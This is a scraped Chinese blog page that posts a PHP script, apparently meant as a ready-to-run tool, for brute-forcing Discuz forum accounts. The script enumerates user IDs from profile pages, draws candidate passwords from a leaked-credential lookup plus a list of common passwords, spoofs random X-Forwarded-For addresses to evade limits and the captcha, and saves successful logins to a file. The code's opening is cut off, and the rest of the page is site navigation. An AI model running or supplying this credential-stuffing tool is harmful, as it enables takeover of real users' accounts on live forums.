Discuz 爆破无视验证码,PHP 调用社工库暴破 Discuz 论坛账户脚本
- 发表于
- 周边
+++++++++++++++++++++++++++++++++++++++++++++++++++
开始爆破:php.exe $argv[0] 网址 起始uid 结束uid
示例: php.exe $argv[0] http://site.me/ 1 255
结果保存在ok.txt里
+++++++++++++++++++++++++++++++++++++++++++++++++++
以下代码保存为exp.php
(.*)$r){
return $r;
}
}
public function getuid($host,$uid){
$ip= rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244);
$opts = array (
'http' => array (
'method' => 'GET',
'header'=> "User-Agent: Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile\r\nReferer:http://www.baidu.com/index.php\r\nX-Forwarded-For: $ip\r\nCookie: xx=xx",
'timeout'=>15, )
);
$context = stream_context_create($opts);
$a=file_get_contents("$host/home.php?mod=space&do=profile&from=space&&uid=$uid",false,$context);
if(strpos($a,'charset=utf-8')){
$a=iconv("UTF-8", "GB2312//IGNORE", $a);
}
if(preg_match("/(.*)的个人/isU",$a,$arr)){
$a=str_replace("\r","",trim($arr[1]));
$a=trim(str_replace("\n","",$a));
return $a;
}else{
return false;
}
}
public function is_pass($host,$user,$pass){
$ip= rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244);
$opts = array (
'http' => array (
'method' => 'GET',
'header'=> "User-Agent: Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobil\r\nReferer:http://www.baidu.com/index.php\r\nX-Forwarded-For: $ip\r\nCookie: xx=xx",
'timeout'=>15, )
);
$context = stream_context_create($opts);
$a=file_get_contents("$host/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1&handlekey=ls&quickforward=yes&username=$user&password=$pass",false,$context);
if(strpos($a,"window.location.href")){
return true;
}else{
return false;
}
}
public function crack($host,$a,$b){
$host=str_replace("http://","",$host);
$host="http://".$host."/";
for($vip=$a;$vip<=$b;$vip++){
if(!($user=$this->getuid($host,$vip))){
continue;
}
$pass=$this->sgk($user);
array_push($pass,"123456");
array_push($pass,"654321");
array_push($pass,"123123");
array_push($pass,"woaini");
array_push($pass,"caonima");
array_push($pass,"12345");
array_push($pass,"12345789");
array_push($pass,"5201314");
array_push($pass,"1314520");
array_push($pass,$user);
array_push($pass,$user."123456");
array_push($pass,"abc123");
array_push($pass,$user."..");
for($i=0;isset($pass[$i]);$i++){
echo "\r\n正在爆破UID:$vip-[".$user."]---".$pass[$i]."";
if($this->is_pass($host,$user,$pass[$i])){
echo "爆破成功!\r\n--------------------";
file_put_contents("ok.txt", $user."---".$pass[$i]."\r\n",FILE_APPEND);
break;
}else{
echo "爆破失败";
}
}
}
}
}
$f=new fuckdz();
//error_reporting(0);
set_time_limit(0);
if(empty($argv[1])){
print_r("
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
开始爆破:php.exe $argv[0] 网址 起始uid 结束uid
示例: php.exe $argv[0] http://phpinfo.me/ 1 255
结果保存在ok.txt里
Blog:http://phpinfo.me
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ \n\n\n
");
}else{
if(!empty($argv[1])){
$f->crack($argv[1],$argv[2],$argv[3]);
}else{
echo "逗比";
}
}
?>
</pre>
<p><img decoding="async" src="https://www.uedbox.com/wp-content/uploads/2014/06/1.jpg" alt="1" class="alignnone size-full wp-image-6539" /></p>
</div>
</div>
<div class="row align-items-center">
<div class="col">
<a id="wp-zan-6536" class="wp-zan btn btn-light w-100 mb-3" onclick="wpzan(6536, 0)" href="javascript:;"><i class="far fa-grin-stars"></i> 点赞(<span>3</span>)</a> </div>
<div class="col">
<button type="button" class="btn btn-primary w-100 mb-3" data-toggle="modal" data-target=".bs-example-modal-sm2"><i class="fas fa-dollar-sign"></i> 打赏</button>
</div>
<div class="col">
<button type="button" class="btn btn-light w-100 mb-3" data-toggle="modal" data-target=".bs-example-modal-sm1"><i class="fa fa-share" aria-hidden="true"></i> 分享</button>
</div>
</div> <div class="alert alert-warning" role="alert">
<span class="d-block tags">标签:<a href="https://www.uedbox.com/post/tag/discuz/" rel="tag">Discuz</a></span>
<span class="d-block">
原文连接:<strong><a href="https://www.uedbox.com/post/6536/">Discuz 爆破无视验证码,PHP 调用社工库暴破 Discuz 论坛账户脚本</a></strong>
</span>
<span>所有媒体,可在保留署名、<code>原文连接</code>的情况下转载,若非则不得使用我方内容。</span>
</div>
<div class="row mb-3">
<span class="col-12 col-md-6"><a title="工作没有卑微,只有最好的工作" href="https://www.uedbox.com/post/6533/">工作没有卑微,只有最好的工作</a></span>
<span class="col-12 col-md-6 text-md-right"><a title="Altman - 开源网站管理工具/WebShell管理工具" href="https://www.uedbox.com/post/6542/">Altman - 开源网站管理工具/WebShell管理工具</a></span>
</div>
</div>
</divµ>
<ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-7160167149913342" data-ad-slot="5065385925" data-ad-format="auto" data-full-width-responsive="true"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</div>
</section>
<section class="fdb-block p-0">
<div class="container">
<ul class="nav nav-tabs mb-0 nav-justified" id="pills-tab" role="tablist">
<li class="nav-item">
<a class="nav-link active" id="pills-home-tab" data-toggle="pill" href="#pills-xg" role="tab" aria-controls="pills-xg" aria-selected="true">相关推荐</a>
</li>
<li class="nav-item">
<a class="nav-link" id="pills-profile-tab" data-toggle="pill" href="#pills-last" role="tab" aria-controls="pills-last" aria-selected="false">最新文章</a>
</li>
<li class="nav-item">
<a class="nav-link" id="pills-profile-tab" data-toggle="pill" href="#pills-30" role="tab" aria-controls="pills-30" aria-selected="false">30天最热</a>
</li>
<li class="nav-item">
<a class="nav-link" id="pills-contact-tab" data-toggle="pill" href="#pills-all" role="tab" aria-controls="pills-all" aria-selected="false">历史最热</a>
</li>
</ul>
</div>
<div class="tab-content bg-light text-center pb-5" id="pills-tabContent">
<div class="tab-pane fade show active container" id="pills-xg" role="tabpanel" aria-labelledby="pills-home-tab">
<div class="row m-0">
<div class="col col-6 col-md-3 p-3 p-md-4 bg-white border border-light shadow-sm otherAnimation">
<a href="https://www.uedbox.com/post/6662/" title="Discuz <= 7.2 SQL未公开注入漏洞" target="_blank" class="d-block">
<img class="img-fluid lazy" src="https://www.uedbox.com/wp-content/themes/UB2019/dist/images/loader.svg" data-src="https://www.uedbox.com/wp-content/themes/UB2019/prcute.php?src=https://www.uedbox.com/wp-content/uploads/2014/07/1.jpg&h=144&w=208&zc=1" alt="Discuz <= 7.2 SQL未公开注入漏洞">
<div class="mt-2 text-break maxLine2">Discuz <= 7.2 SQL未公开注入漏洞</div>
</a>
</div>
<div class="col col-6 col-md-3 p-3 p-md-4 bg-white border border-light shadow-sm otherAnimation">
<a href="https://www.uedbox.com/post/5351/" title="discuz X2.5 爆物理地址路径漏洞!" target="_blank" class="d-block">
<img class="img-fluid lazy" src="https://www.uedbox.com/wp-content/themes/UB2019/dist/images/loader.svg" data-src="https://www.uedbox.com/wp-content/themes/UB2019/prcute.php?src=https://www.uedbox.com/wp-content/themes/UB2019/dist/images/random/27.jpg&h=144&w=208&zc=1" alt="discuz X2.5 爆物理地址路径漏洞!">
<div class="mt-2 text-break maxLine2">discuz X2.5 爆物理地址路径漏洞!</div>
</a>
</div>
<div class="col col-6 col-md-3 p-3 p-md-4 bg-white border border-light shadow-sm otherAnimation">
<a href="https://www.uedbox.com/post/4723/" title="Discuz7.X通杀0day(UCenter Home-2.0)" target="_blank" class="d-block">
<img class="img-fluid lazy" src="https://www.uedbox.com/wp-content/themes/UB2019/dist/images/loader.svg" data-src="https://www.uedbox.com/wp-content/themes/UB2019/prcute.php?src=https://www.uedbox.com/wp-content/themes/UB2019/dist/images/random/24.jpg&h=144&w=208&zc=1" alt="Discuz7.X通杀0day(UCenter Home-2.0)">
<div class="mt-2 text-break maxLine2">Discuz7.X通杀0day(UCenter Home-2.0)</div>
</a>
</div>
<div class="col col-6 col-md-3 p-3 p-md-4 bg-white border border-light shadow-sm otherAnimation">
<a href="https://www.uedbox.com/post/3133/" title="Discuz!多版本,存储型XSS脚本漏洞(0day)" target="_blank" class="d-block">
<img class="img-fluid lazy" src="https://www.uedbox.com/wp-content/themes/UB2019/dist/images/loader.svg" data-src="https://www.uedbox.com/wp-content/themes/UB2019/prcute.php?src=https://www.uedbox.com/wp-content/themes/UB2019/dist/images/random/12.jpg&h=144&w=208&zc=1" alt="Discuz!多版本,存储型XSS脚本漏洞(0day)">
<div class="mt-2 text-break maxLine2">Discuz!多版本,存储型XSS脚本漏洞(0day)</div>
</a>
</div>
<div class="col col-6 col-md-3 p-3 p-md-4 bg-white border border-light shadow-sm otherAnimation">
<a href="https://www.uedbox.com/post/143/" title="PHPWind与阿里巴巴、Comsenz与腾讯" target="_blank" class="d-block">
<img class="img-fluid lazy" src="https://www.uedbox.com/wp-content/themes/UB2019/dist/images/loader.svg" data-src="https://www.uedbox.com/wp-content/themes/UB2019/prcute.php?src=https://www.uedbox.com/wp-content/themes/UB2019/dist/images/random/27.jpg&h=144&w=208&zc=1" alt="PHPWind与阿里巴巴、Comsenz与腾讯">
<div class="mt-2 text-break maxLine2">PHPWind与阿里巴巴、Comsenz与腾讯</div>
</a>
</div>
<div class="col col-6 col-md-3 p-3 p-md-4 bg-white border border-light shadow-sm otherAnimation">
<a href="https://www.uedbox.com/post/119332/" title="解决:could not launch ‘sdk-path/../emulator/qemu/darwin-x86_64/qemu-system-i38" target="_blank" class="d-block">
<img class="img-fluid lazy" src="https://www.uedbox.com/wp-content/themes/UB2019/dist/images/loader.svg" data-src="https://www.uedbox.com/wp-content/themes/UB2019/prcute.php?src=https://www.uedbox.com/wp-content/themes/UB2019/dist/images/random/8.jpg&h=144&w=208&zc=1" alt="解决:could not launch ‘sdk-path/../emulator/qemu/darwin-x86_64/qemu-system-i38">
<div class="mt-2 text-break maxLine2">解决:could not launch ‘sdk-path/../emulator/qemu/darwin-x86_64/qemu-system-i38</div>
</a>
</div>
<div class="col col-6 col-md-3 p-3 p-md-4 bg-white border border-light shadow-sm otherAnimation">
<a href="https://www.uedbox.com/post/119330/" title="Mac下反编译微信小程序获得源码" target="_blank" class="d-block">
<img class="img-fluid lazy" src="https://www.uedbox.com/wp-content/themes/UB2019/dist/images/loader.svg" data-src="https://www.uedbox.com/wp-content/themes/UB2019/prcute.php?src=https://www.uedbox.com/wp-content/uploads/2025/03/20250312-104816@2x.png&h=144&w=208&zc=1" alt="Mac下反编译微信小程序获得源码">
<div class="mt-2 text-break maxLine2">Mac下反编译微信小程序获得源码</div>
</a>
</div>
<div class="col col-6 col-md-3 p-3 p-md-4 bg-white border border-light shadow-sm otherAnimation">
<a href="https://www.uedbox.com/post/119326/" title="解决:MacOS无法安装 Charles SSL证书" target="_blank" class="d-block">
<img class="img-fluid lazy" src="https://www.uedbox.com/wp-content/themes/UB2019/dist/images/loader.svg" data-src="https://www.uedbox.com/wp-content/themes/UB2019/prcute.php?src=https://www.uedbox.com/wp-content/uploads/2025/03/20250301-141904@2x.png&h=144&w=208&zc=1" alt="解决:MacOS无法安装 Charles SSL证书">
<div class="mt-2 text-break maxLine2">解决:MacOS无法安装 Charles SSL证书</div>
</a>
</div>
</div>
</div>
<div class="tab-pane fade container" id="pills-last" role="tabpanel" aria-labelledby="pills-profile-tab">
<div class="row m-0">
<div class="col col-6 col-md-3 p-3 p-md-4 bg-white border border-light shadow-sm otherAnimation">
<a href="https://www.uedbox.com/post/119343/" title="让一个 Git 项目丢弃之前的提交历史,只保留当前版本并将其作为最新版" class="d-block">
<img class="img-fluid lazy" src="https://www.uedbox.com/wp-content/themes/UB2019/dist/images/loader.svg" data-src="https://www.uedbox.com/wp-content/themes/UB2019/prcute.php?src=https://www.uedbox.com/wp-content/themes/UB2019/dist/images/random/13.jpg&h=144&w=208&zc=1" alt="让一个 Git 项目丢弃之前的提交历史,只保留当前版本并将其作为最新版">
<div class="mt-2 text-break maxLine2">让一个 Git 项目丢弃之前的提交历史,只保留当前版本并将其作为最新版</div>
</a>
</div>
<div class="col col-6 col-md-3 p-3 p-md-4 bg-white border border-light shadow-sm otherAnimation">
<a href="https://www.uedbox.com/post/119335/" title="解决Cursor在免费订阅期间出现以下提示的问题: You've reached your trial request limit. / Too many free trial accounts used on this machine. Please upgrade to pro" class="d-block">
<img class="img-fluid lazy" src="https://www.uedbox.com/wp-content/themes/UB2019/dist/images/loader.svg" data-src="https://www.uedbox.com/wp-content/themes/UB2019/prcute.php?src=https://www.uedbox.com/wp-content/uploads/2025/03/run_success.png&h=144&w=208&zc=1" alt="解决Cursor在免费订阅期间出现以下提示的问题: You've reached your trial request limit. / Too many free trial accounts used on this machine. Please upgrade to pro">
<div class="mt-2 text-break maxLine2">解决Cursor在免费订阅期间出现以下提示的问题: You've reached your trial request limit. / Too many free trial accounts used on this machine. Please upgrade to pro</div>
</a>
</div>
<div class="col col-6 col-md-3 p-3 p-md-4 bg-white border border-light shadow-sm otherAnimation">
<a href="https://www.uedbox.com/post/119332/" title="解决:could not launch ‘sdk-path/../emulator/qemu/darwin-x86_64/qemu-system-i38" class="d-block">
<img class="img-fluid lazy" src="https://www.uedbox.com/wp-content/themes/UB2019/dist/images/loader.svg" data-src="https://www.uedbox.com/wp-content/themes/UB2019/prcute.php?src=https://www.uedbox.com/wp-content/themes/UB2019/dist/images/random/6.jpg&h=144&w=208&zc=1" alt="解决:could not launch ‘sdk-path/../emulator/qemu/darwin-x86_64/qemu-system-i38">
<div class="mt-2 text-break maxLine2">解决:could not launch ‘sdk-path/../emulator/qemu/darwin-x86_64/qemu-system-i38</div>
</a>
</div>
<div class="col col-6 col-md-3 p-3 p-md-4 bg-white border border-light shadow-sm otherAnimation">
<a href="https://www.uedbox.com/post/119330/" title="Mac下反编译微信小程序获得源码" class="d-block">
<img class="img-fluid lazy" src="https://www.uedbox.com/wp-content/themes/UB2019/dist/images/loader.svg" data-src="https://www.uedbox.com/wp-content/themes/UB2019/prcute.php?src=https://www.uedbox.com/wp-content/uploads/2025/03/20250312-104816@2x.png&h=144&w=208&zc=1" alt="Mac下反编译微信小程序获得源码">
<div class="mt-2 text-break maxLine2">Mac下反编译微信小程序获得源码</div>
</a>
</div>
<div class="col col-6 col-md-3 p-3 p-md-4 bg-white border border-light shadow-sm otherAnimation">
<a href="https://www.uedbox.com/post/119326/" title="解决:MacOS无法安装 Charles SSL证书" class="d-block">
<img class="img-fluid lazy" src="https://www.uedbox.com/wp-content/themes/UB2019/dist/images/loader.svg" data-src="https://www.uedbox.com/wp-content/themes/UB2019/prcute.php?src=https://www.uedbox.com/wp-content/uploads/2025/03/20250301-141904@2x.png&h=144&w=208&zc=1" alt="解决:MacOS无法安装 Charles SSL证书">
<div class="mt-2 text-break maxLine2">解决:MacOS无法安装 Charles SSL证书</div>
</a>
</div>
<div class="col col-6 col-md-3 p-3 p-md-4 bg-white border border-light shadow-sm otherAnimation">
<a href="https://www.uedbox.com/post/119320/" title="UWB 信号干扰问题分析与优化方案" class="d-block">
<img class="img-fluid lazy" src="https://www.uedbox.com/wp-content/themes/UB2019/dist/images/loader.svg" data-src="https://www.uedbox.com/wp-content/themes/UB2019/prcute.php?src=https://www.uedbox.com/wp-content/uploads/2025/02/Aker-website_UWB-infographic_web-scaled-1.jpg&h=144&w=208&zc=1" alt="UWB 信号干扰问题分析与优化方案">
<div class="mt-2 text-break maxLine2">UWB 信号干扰问题分析与优化方案</div>
</a>
</div>
<div class="col col-6 col-md-3 p-3 p-md-4 bg-white border border-light shadow-sm otherAnimation">
<a href="https://www.uedbox.com/post/119315/" title="全球AI大模型2024全景图:核心技术、应用场景与中美领跑者深度解析" class="d-block">
<img class="img-fluid lazy" src="https://www.uedbox.com/wp-content/themes/UB2019/dist/images/loader.svg" data-src="https://www.uedbox.com/wp-content/themes/UB2019/prcute.php?src=https://www.uedbox.com/wp-content/uploads/2025/02/ai_logo.jpg&h=144&w=208&zc=1" alt="全球AI大模型2024全景图:核心技术、应用场景与中美领跑者深度解析">
<div class="mt-2 text-break maxLine2">全球AI大模型2024全景图:核心技术、应用场景与中美领跑者深度解析</div>
</a>
</div>
<div class="col col-6 col-md-3 p-3 p-md-4 bg-white border border-light shadow-sm otherAnimation">
<a href="https://www.uedbox.com/post/119313/" title="vscode运行flutter项目ios真机" class="d-block">
<img class="img-fluid lazy" src="https://www.uedbox.com/wp-content/themes/UB2019/dist/images/loader.svg" data-src="https://www.uedbox.com/wp-content/themes/UB2019/prcute.php?src=https://www.uedbox.com/wp-content/themes/UB2019/dist/images/random/8.jpg&h=144&w=208&zc=1" alt="vscode运行flutter项目ios真机">
<div class="mt-2 text-break maxLine2">vscode运行flutter项目ios真机</div>
</a>
</div>
</div>
</div>
<div class="tab-pane fade container" id="pills-30" role="tabpanel" aria-labelledby="pills-profile-tab">
<div class="row m-0">
<div class="col-12 bg-white border border-light shadow-sm p-3">
<ul class="list-unstyled mb-0">
<li><a href="https://www.uedbox.com/post/119332/" title="解决:could not launch ‘sdk-path/../emulator/qemu/darwin-x86_64/qemu-system-i38">解决:could not launch ‘sdk-path/../emulator/qemu/darwin-x86_64/qemu-system-i38</a></li><li><a href="https://www.uedbox.com/post/119330/" title="Mac下反编译微信小程序获得源码">Mac下反编译微信小程序获得源码</a></li><li><a href="https://www.uedbox.com/post/119335/" title="解决Cursor在免费订阅期间出现以下提示的问题: You’ve reached your trial request limit. / Too many free trial accounts used on this machine. Please upgrade to pro">解决Cursor在免费订阅期间出现以下提示的问题: You’ve reached your trial request limit. / Too many free trial accounts used on this machine. Please upgrade to pro</a></li><li><a href="https://www.uedbox.com/post/119343/" title="让一个 Git 项目丢弃之前的提交历史,只保留当前版本并将其作为最新版">让一个 Git 项目丢弃之前的提交历史,只保留当前版本并将其作为最新版</a></li> </ul>
</div>
</div>
</div>
<div class="tab-pane fade container" id="pills-all" role="tabpanel" aria-labelledby="pills-contact-tab">
<div class="row m-0">
<div class="col-12 bg-white border border-light shadow-sm p-3">
<ul class="list-unstyled mb-0">
<li><a href="https://www.uedbox.com/post/54994/" title="2025 BT磁力搜索引擎大全【最新优质】">2025 BT磁力搜索引擎大全【最新优质】</a></li><li><a href="https://www.uedbox.com/post/55287/" title="怎么用图片搜索番号?以图搜图AI搜图">怎么用图片搜索番号?以图搜图AI搜图</a></li><li><a href="https://www.uedbox.com/post/56387/" title="this channel is blocked because it was used:Telegram群组/频道屏蔽解决方法">this channel is blocked because it was used:Telegram群组/频道屏蔽解决方法</a></li><li><a href="https://www.uedbox.com/post/58618/" title="最新ESET NOD32 License Key/激活码/许可证密钥/用户名密码">最新ESET NOD32 License Key/激活码/许可证密钥/用户名密码</a></li><li><a href="https://www.uedbox.com/post/3902/" title="谷歌识图,以图搜图">谷歌识图,以图搜图</a></li><li><a href="https://www.uedbox.com/post/50992/" title="No Access-Control-Allow-Origin 跨域错误解决">No Access-Control-Allow-Origin 跨域错误解决</a></li><li><a href="https://www.uedbox.com/post/59475/" title="7款常用《网络抓包工具》更新">7款常用《网络抓包工具》更新</a></li><li><a href="https://www.uedbox.com/post/56509/" title="手机BT/种子下载,手机磁力链下载软件整理">手机BT/种子下载,手机磁力链下载软件整理</a></li><li><a href="https://www.uedbox.com/post/69704/" title="2025免费在线影视/动漫番剧优质网站,合集汇总更新">2025免费在线影视/动漫番剧优质网站,合集汇总更新</a></li><li><a href="https://www.uedbox.com/post/7182/" title="404.php webshell">404.php webshell</a></li><li><a href="https://www.uedbox.com/post/59017/" title="一个绕过Google谷歌验证码(reCAPTCHA)的方法">一个绕过Google谷歌验证码(reCAPTCHA)的方法</a></li><li><a href="https://www.uedbox.com/post/51126/" title="网络安全“Cyber security”和“Network security”的区别">网络安全“Cyber security”和“Network security”的区别</a></li><li><a href="https://www.uedbox.com/post/54446/" title="9部有史以来最好的黑客电影">9部有史以来最好的黑客电影</a></li><li><a href="https://www.uedbox.com/post/55544/" title="用uBlock Origin过滤广告,享受最好的广告拦截体验">用uBlock Origin过滤广告,享受最好的广告拦截体验</a></li><li><a href="https://www.uedbox.com/post/66281/" title="解决Play商店“从服务器检索信息时出错DF-DFERH-01”">解决Play商店“从服务器检索信息时出错DF-DFERH-01”</a></li> </ul>
</div>
</div>
</div>
</div>
</section>
<footer class="fdb-block bg-light footer-large-s">
<div class="container-fluid">
<div class="row align-items-top text-center m-2">
<div class="col-12 col-md-6 col-lg-7 text-md-left">
<div class="d-none d-md-block">
<img class="img_filter_gray ft_logo_img" alt="体验盒子" src="https://www.uedbox.com/wp-content/themes/UB2019/imgs/logo.png">
</div>
<ul class="list-inline d-none d-md-block pt-2">
<li class="list-inline-item"><a href="https://www.uedbox.com/about">关于</a></li>
<li class="list-inline-item"><a href="https://www.uedbox.com/blog">博文</a></li>
<li class="list-inline-item"><a href="https://www.uedbox.com/share">分享</a></li>
<li class="list-inline-item"><a href="https://www.uedbox.com/archives">存档</a></li>
<li class="list-inline-item"><a href="https://www.uedbox.com/service">服务</a></li>
</ul>
<div class="text-muted">体验盒子所发布的一切资源仅限用于学习和研究目的。不得用于非法用途,否则,一切后果用户自负。
</div>
<p class="text-muted"><i class="far fa-copyright"></i>2024 <a href="https://www.uedbox.com/" class="text-reset text-decoration-none">体验盒子</a>, <a class="text-reset text-decoration-none" href="https://beian.miit.gov.cn/" target="_blank" rel="nofollow">滇ICP备15006848号-1</a></p>
</div>
<div class="col-12 col-md-6 col-lg-3 ml-auto text-lg-right mt-4 mt-md-0 align-self-center">
<p class="h2">
<a href="https://twitter.com/uedbox" class="mx-2" target="_blank"><i class="fab fa-twitter" aria-hidden="true"></i></a>
<a href="https://www.uedbox.com/wp-sitemap.xml" class="mx-2" target="_blank"><i class="fas fa-rss-square" aria-hidden="true"></i></a>
<a href="https://www.uedbox.com/feed" class="mx-2" target="_blank"><i class="fas fa-rss" aria-hidden="true"></i></a>
</p>
</div>
</div>
</div>
</footer>
<div class="modal fade bs-example-modal-sm" tabindex="-1" role="dialog" aria-labelledby="mySmallModalLabel">
<div class="modal-dialog modal-sm">
<div class="modal-content">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
<h4 class="modal-title" id="mySmallModalLabel">扫码分享</h4>
</div>
<div class="modal-body">
<img src="https://www.uedbox.com/wp-content/themes/UB2019/dist/images/wx_qr.jpg" alt="网络安全" class="img-rounded img-responsive">
<div class="text-center">验证:<code>体验盒子</code></div>
</div>
</div>
</div>
</div>
<div class="modal fade bs-example-modal-sm1" tabindex="-1" role="dialog" aria-labelledby="mySmallModalLabel1">
<div class="modal-dialog modal-sm">
<div class="modal-content">
<div class="modal-header">
<h5 class="modal-title" id="mySmallModalLabel">扫码分享</h5>
<button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
</div>
<div class="modal-body text-center">
<img class="img-fluid" src="https://www.uedbox.com/wp-content/themes/UB2019/functions/qr/?m=5&e=L&p=6&url=https://www.uedbox.com/post/119343/" alt="网络安全">
</div>
</div>
</div>
</div>
<div class="modal fade bs-example-modal-sm2" tabindex="-1" role="dialog" aria-labelledby="mySmallModalLabel2">
<div class="modal-dialog modal-sm">
<div class="modal-content">
<div class="modal-header">
<h5 class="modal-title" id="mySmallModalLabel">打赏零钱</h5>
<button type="button" class="close" data-dismiss="modal" aria-label="Close">
<span aria-hidden="true">×</span></button>
</div>
<div class="modal-body">
<ul class="nav nav-tabs nav-justified" role="tablist">
<li role="presentation" class="nav-item active">
<a class="nav-link active" href="#alipay" aria-controls="alipay" role="tab" data-toggle="tab">支付宝打赏</a>
</li>
<li role="presentation" class="nav-item">
<a class="nav-link" href="#wx_pay" aria-controls="wx_pay" role="tab" data-toggle="tab">微信打赏</a>
</li>
</ul>
<div class="tab-content">
<div role="tabpanel" class="tab-pane fade show active" id="alipay">
<img src="https://www.uedbox.com/wp-content/themes/UB2019/dist/images/alipay.png" class="img-fluid mt-3">
</div>
<div role="tabpanel" class="tab-pane fade" id="wx_pay">
<img src="https://www.uedbox.com/wp-content/themes/UB2019/dist/images/wx_pay.png" class="img-fluid mt-3">
</div>
</div>
</div>
</div>
</div>
</div>
<script type="text/javascript" id="ez-toc-scroll-scriptjs-js-extra">
/* <![CDATA[ */
var eztoc_smooth_local = {"scroll_offset":"30","add_request_uri":""};
/* ]]> */
</script>
<script type="text/javascript" src="https://www.uedbox.com/wp-content/plugins/easy-table-of-contents/assets/js/smooth_scroll.min.js?ver=2.0.71" id="ez-toc-scroll-scriptjs-js"></script>
<script type="text/javascript" src="https://www.uedbox.com/wp-content/plugins/easy-table-of-contents/vendor/js-cookie/js.cookie.min.js?ver=2.2.1" id="ez-toc-js-cookie-js"></script>
<script type="text/javascript" src="https://www.uedbox.com/wp-content/plugins/easy-table-of-contents/vendor/sticky-kit/jquery.sticky-kit.min.js?ver=1.9.2" id="ez-toc-jquery-sticky-kit-js"></script>
<script type="text/javascript" id="ez-toc-js-js-extra">
/* <![CDATA[ */
var ezTOC = {"smooth_scroll":"1","visibility_hide_by_default":"","scroll_offset":"30","fallbackIcon":"<span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #999;color:#999\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #999;color:#999\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span>","chamomile_theme_is_on":""};
/* ]]> */
</script>
<script type="text/javascript" src="https://www.uedbox.com/wp-content/plugins/easy-table-of-contents/assets/js/front.min.js?ver=2.0.71-1734524970" id="ez-toc-js-js"></script>
<script type="text/javascript" id="wpfront-scroll-top-js-extra">
/* <![CDATA[ */
var wpfront_scroll_top_data = {"data":{"css":"#wpfront-scroll-top-container{display:none;position:fixed;cursor:pointer;z-index:9999;opacity:0}#wpfront-scroll-top-container div.text-holder{padding:3px 10px;border-radius:3px;-webkit-border-radius:3px;-webkit-box-shadow:4px 4px 5px 0 rgba(50,50,50,.5);-moz-box-shadow:4px 4px 5px 0 rgba(50,50,50,.5);box-shadow:4px 4px 5px 0 rgba(50,50,50,.5)}#wpfront-scroll-top-container a{outline-style:none;box-shadow:none;text-decoration:none}#wpfront-scroll-top-container {right: 20px;bottom: 150px;} #wpfront-scroll-top-container img {\n width: auto;\n height: auto;\n }\n ","html":"<div id=\"wpfront-scroll-top-container\"><img src=\"https:\/\/www.uedbox.com\/wp-content\/plugins\/wpfront-scroll-top\/images\/icons\/1.png\" alt=\"\" title=\"\" \/><\/div>","data":{"hide_iframe":false,"button_fade_duration":0,"auto_hide":false,"auto_hide_after":2,"scroll_offset":100,"button_opacity":0.8,"button_action":"top","button_action_element_selector":"","button_action_container_selector":"html, body","button_action_element_offset":0,"scroll_duration":400}}};
/* ]]> */
</script>
<script src="https://www.uedbox.com/wp-content/plugins/wpfront-scroll-top/js/wpfront-scroll-top.min.js?ver=2.2.10081" id="wpfront-scroll-top-js" async="async" defer="defer"></script>
<script>
var _hmt = _hmt || [];
(function() {
var hm = document.createElement("script");
hm.src = "https://hm.baidu.com/hm.js?6c83e97b3b3c196e0b1250cc1eef78a9";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(hm, s);
})();
</script>
<script>
(function() {
var bp = document.createElement('script');
var curProtocol = window.location.protocol.split(':')[0];
if (curProtocol === 'https') {
bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
} else {
bp.src = 'http://push.zhanzhang.baidu.com/push.js';
}
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(bp, s);
})();
</script>
<script>
window.onload = function() {
setTimeout(function() {
let script = document.createElement("script");
script.setAttribute("async", "");
script.src = "//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js";
document.body.appendChild(script);
}, 1500);
}
</script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag() {
dataLayer.push(arguments);
}
gtag('js', new Date());
gtag('config', 'UA-23482352-2');
window.addEventListener('load', function() {
var s = document.createElement('script');
s.src = "https://www.googletagmanager.com/gtag/js?id=UA-23482352-2";
document.body.appendChild(s);
});
</script>
<script>
(function() {
var el = document.createElement("script");
el.src = "https://lf1-cdn-tos.bytegoofy.com/goofy/ttzz/push.js?7f157c3bf816d8cc856c22f1dd3208b47984857ea0f0e0dcb5ec16ad56e21191fd9a9dcb5ced4d7780eb6f3bbd089073c2a6d54440560d63862bbf4ec01bba3a";
el.id = "ttzz";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(el, s);
})(window)
</script>
<script>
// 数字计数动画
document.addEventListener('DOMContentLoaded', function() {
const counters = document.querySelectorAll('.counter');
